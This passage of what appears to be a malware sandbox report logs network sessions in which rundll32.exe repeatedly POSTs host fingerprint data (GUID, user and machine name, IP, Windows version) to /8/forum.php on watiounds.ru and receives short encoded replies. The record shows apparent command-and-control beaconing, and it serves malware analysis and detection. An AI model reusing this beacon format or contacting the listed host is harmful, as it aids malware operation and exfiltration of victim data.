                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:32.097831011 CEST | 203 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          151 | 192.168.2.22 | 49316 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:32.745980024 CEST | 204 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:32.872827053 CEST | 204 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJAZQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          152 | 192.168.2.22 | 49317 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:33.711646080 CEST | 205 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:33.841691017 CEST | 205 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMVENARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          153 | 192.168.2.22 | 49318 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:34.168292046 CEST | 206 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:34.292617083 CEST | 207 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          154 | 192.168.2.22 | 49319 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:34.622296095 CEST | 207 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:34.756405115 CEST | 208 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 47 54 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZGTAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          155 | 192.168.2.22 | 49320 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:35.073648930 CEST | 208 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:35.199522972 CEST | 209 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          156 | 192.168.2.22 | 49321 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:35.526973963 CEST | 210 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:35.651738882 CEST | 210 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          157 | 192.168.2.22 | 49322 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:35.979156971 CEST | 211 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:36.102766991 CEST | 211 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4e 4d 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFNMUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          158 | 192.168.2.22 | 49323 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:36.422058105 CEST | 212 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:36.545897961 CEST | 212 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHZASARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          159 | 192.168.2.22 | 49324 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:36.872833967 CEST | 213 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.003320932 CEST | 213 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 43 58 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVCXEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          16 | 192.168.2.22 | 49181 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:20:17.727369070 CEST | 45 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:17.850480080 CEST | 45 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 51 4a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVQJEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          160 | 192.168.2.22 | 49325 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:37.359987020 CEST | 214 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.488110065 CEST | 214 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGMNTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          161 | 192.168.2.22 | 49326 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:37.805228949 CEST | 215 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:37.938340902 CEST | 216 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          162 | 192.168.2.22 | 49327 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:38.258582115 CEST | 216 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:38.389040947 CEST | 217 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMYBNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          163 | 192.168.2.22 | 49328 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:38.702413082 CEST | 217 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:38.824894905 CEST | 218 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:38 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBZAYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          164 | 192.168.2.22 | 49329 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:39.143122911 CEST | 219 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:39.265633106 CEST | 219 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          165 | 192.168.2.22 | 49330 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:39.578965902 CEST | 220 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:39.701931953 CEST | 220 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNGTMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          166 | 192.168.2.22 | 49331 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:40.031402111 CEST | 221 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
